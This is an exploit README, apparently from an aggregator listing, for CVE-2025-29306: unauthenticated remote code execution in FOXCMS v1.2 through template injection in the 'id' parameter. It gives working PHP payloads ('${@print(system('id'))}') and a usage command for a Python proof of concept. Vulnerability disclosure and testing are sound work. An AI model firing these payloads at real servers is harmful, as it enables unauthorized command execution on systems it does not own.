## https://sploitus.com/exploit?id=287AFBC8-F50F-527D-900A-3BEBC2E4E43D
# FOXCMS Parameter Injection RCE (CVE-2025-29306)
This repository contains a Python-based PoC for a Remote Code Execution (RCE) vulnerability affecting FOXCMS v1.2, a Chinese open-source content management system.
> CVE-ID: CVE-2025-29306
> Affects: FOXCMS v1.2
> Type: Service Parameter Injection leading to Code Execution
---
## Vulnerability Summary
FOXCMS v1.2 does not safely handle the `id` parameter of the `/images/index.html` endpoint: the value is evaluated as a template expression rather than treated as data. An attacker can therefore supply `${@print(...)}` expressions in `id`, and whatever PHP is placed inside the call is executed on the server (for example `phpinfo()` for confirmation, or `system()` for OS command execution). No authentication is described as being required.
---
## PoC Usage
### Requirements
- Python 3.x
- `requests` library
```bash
pip install requests
```

### Usage

```bash
python foxcms_poc.py http://target.com/images/index.html?id=
```

The script places `${@print()}` expressions into the `id` parameter, for example:

```php
${@print(phpinfo())}
${@print(system('id'))}
```

The first payload confirms PHP evaluation by returning the `phpinfo()` output; the second executes the OS command `id` through `system()` and prints its result in the response.

---
## Legal Disclaimer
This code is for educational purposes and authorized security testing only.
Do NOT use it on systems you do not own or have permission to test.

## Author
Inok009